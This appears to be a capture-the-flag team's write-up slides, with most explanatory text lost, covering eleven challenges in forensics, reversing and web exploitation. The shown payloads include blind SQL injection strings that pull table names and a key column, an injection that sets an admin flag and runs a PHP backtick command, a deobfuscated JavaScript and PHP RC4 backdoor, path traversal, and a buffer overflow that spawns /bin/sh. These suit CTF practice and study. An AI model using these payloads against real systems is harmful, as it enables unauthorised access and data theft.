hkpco, hellsonic, lokihardt, gogil

1 / 16

S1_Hello_kiki: 100
hello_kiki.pcap .
RTP , -> VoIP Calls
, .

2 / 16

S2_qu3st2: 150
IDA .

base64 decode .

3 / 16

S3_Find a key: 200

IDA .

4 / 16

S4_Find a key and encode MD5: 300

jpg .jpg .jpg 3 jpg .

jpg FFD9 FFD9 2Byte .

2Byte .jpg = 90, .jpg = 180, .jpg = 270 .

.jpg (x.y.z) 5x5x5 ,

.jpg .jpg .
E 90, 180, 270 Y
. .

5 / 16

KEY IS A TCAN

md5(TCAN)

Key) 2ceb9b1a93b1b4ea9a57a117ddc3acfa

6 / 16

S5_Find a key : 400

modify_ok.php
Blind SQL Injection .
sex=if((select substr(LPAD(bin(ascii(substr((SELECT table_name FROM information_schema.tables
WHERE table_type='base table' limit 1,1),$j,1))),8,0),$i,1)),1,2)

war_key , war_key .
war_key .
if((select substr(LPAD(bin(ascii(substr((SELECT war_key FROM war_key limit 0,1),$j,1))),8,0),$i,1)),1,2)

Key) President_of_HUST_is_Bother_Me

7 / 16

S6_Find a key: 400

IDA xor 2
.

c NULL 21 xor .

8 / 16

S7_W T F: 350
a~z, A ~ Z input 'i' .
stringX gqSQUMGsmIeuiE .

Constraint Programming solver a = 1, b = 6, c = 2

abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
x .
stringX WOWOCSWWSOCCOC .

9 / 16

S8_Find a key: 400

find_account_question insert SQL injection

0,1,2,3...,"Y",...)#

(is_admin "Y" ) , ,

<?=`cat ThisisKeyFile.php`?> .

10 / 16

S9_Find a key: 600

. .

<?php
/* --- */
$ip = "[****]";
$key = "[****]";
/*It's my door trick*/
$a=$_GET[a];
$b=$a;
if(is_array($a)){
$a= implode($a);
$x= substr($a,strlen($key));
}
if($key==substr($a,0,strlen($key))){
if(is_numeric(($b[count($b)]))){
$y = $ip."[****]";
$xx = $key.$x;
$r_key = [R**]($xx, $y);
}
}
$r_key=(base64_encode($r_key));
$r_key=str_replace('+','||',$r_key);
/* ---- */
if($_GET[glob_dir]){
print_r(glob("/var/www/html/".$_GET[glob_dir]));
11 / 16

}
?>

eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharC
ode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return
r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new
RegExp('\\b'+e(c)+'\\b','g'),k[c]);return
p}('T(K(p,a,N,k,e,r){e=K(c){L(c<a?\'\':e(U(c/a)))+((c=c%a)>V?O.W(c+X):c.Y(Z))};M(!\'\'.P(/^/,O)){Q(c-)r[e(c)]=k[c]||e(c);k=[K(e){L

r[e]}];e=K(){L\'\\\\w+\'};c=1};Q(c--)M(k[c])p=p.P(R

10(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c]);L
3();2(8.3){c=1

p}(\'0="";0+="i";j="k";l=4;m

3();2(c.9){c.9(\\\'o/p\\\')}}q

5("s.6")}f(e){}}}2(!c){t(\\\'u

:(

2(8.5){d{c=1
y

z\\\');g

7(a,b){n

c=1

5("r.6")}f(e){d{c=1
A}c.B("C",a,h);c.D(E);g

h}0+="F";0+="G";0+="H";7("a.I?a="+J);\',S,S,\'11|R|M|12||13|14|15|16|17||||18||19|L|1a|1b|N|1c|1d|K|1
e|1f|1g|1h|1i|1j|1k|1l|1m|1n|1o|1p|1q|1r|1s|1t|1u|1v|1w|1x|1y|1z|1A\'.1B(\'|\'),0,{}))',62,100,'||||||||||||||||||||
||||||||||||||||||||||||||function|return|if|Cstar|String|replace|while|new|46|eval|parseInt|35|fromCharCode|29|t
oString|36|RegExp|key|XMLHttpRequest|ActiveXObject|XMLHTTP|makeRequest|window|overrideMim
eType|try|catch|true|0xde|alone|rc|var|text|xml|else|Msxml2|Microsoft|alert|Giving|up|Cannot|create|a
n|instance|false|open|GET|send|null|ad|be|ef|php|sc|split'.split('|'),0,{}))

eval -> alert

eval(function(p,a,Cstar,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCh
arCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return
r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new
RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('0="";0+="i";j="k";l=4;m 7(a,b){n c=1 3();2(8.3){c=1
3();2(c.9){c.9(\'o/p\')}}q 2(8.5){d{c=1 5("r.6")}f(e){d{c=1 5("s.6")}f(e){}}}2(!c){t(\'u v :( w x y 6 z\');g
A}c.B("C",a,h);c.D(E);g
h}0+="F";0+="G";0+="H";7("a.I?a="+J);',46,46,'key|new|if|XMLHttpRequest||ActiveXObject|XMLHTTP|
makeRequest|window|overrideMimeType||||try||catch|return|true|0xde|Cstar|alone|rc|function|var|text|
xml|else|Msxml2|Microsoft|alert|Giving|up|Cannot|create|an|instance|false|open|GET|send|null|ad|be|e
f|php|sc'.split('|'),0,{}))

, function Cstar c .
12 / 16

key = "";
key += "0xde";
Cstar = "alone";
rc = 4;
function makeRequest(a, b) {
var c = new XMLHttpRequest();
if (window.XMLHttpRequest) {
c = new XMLHttpRequest();
if (c.overrideMimeType) {
c.overrideMimeType('text/xml')
}
} else if (window.ActiveXObject) {
try {
c = new ActiveXObject("Msxml2.XMLHTTP")
} catch (e) {
try {
c = new ActiveXObject("Microsoft.XMLHTTP")
} catch (e) {}
}
}
if (!c) {
alert('Giving up :( Cannot create an XMLHTTP instance');
return false
}
c.open("GET", a, true);
c.send(null);
return true
}
key += "ad";
key += "be";
key += "ef";
makeRequest("a.php?a=" + sc);

13 / 16

 0xdeadbeef , PHP [R**] RC4

.
a 0xdeadbeef(3735928559) RC4
.
makeRequest("a.php?b=7csrkIlsU4EJNCl/TmEk||ElHZ6tdy2eWOp8NvQ==&x=");
x 0xdeaedbeef 3735928559 youtube .

7csrkIlsU4EJNCl/TmEk||ElHZ6tdy2eWOp8NvQ== 0xdeadbeef ARCFOUR Decrypt

192.168.0.12_get_./download , 192.168.0.12_get_../../../key
.

14 / 16

S10_Find a key: 500

strcpy bof
.

./bin -h a -d xxxxxx... (h )

/home/k1r.. PC
.
printf pc .
, execl printf
null , execl /bin/sh] \n .
/bin /tmp , tmp sh] \n .

15 / 16

S11_Find a key: 500

jsp apk apk otp

.
( - 1)

Boss.smali

16 / 16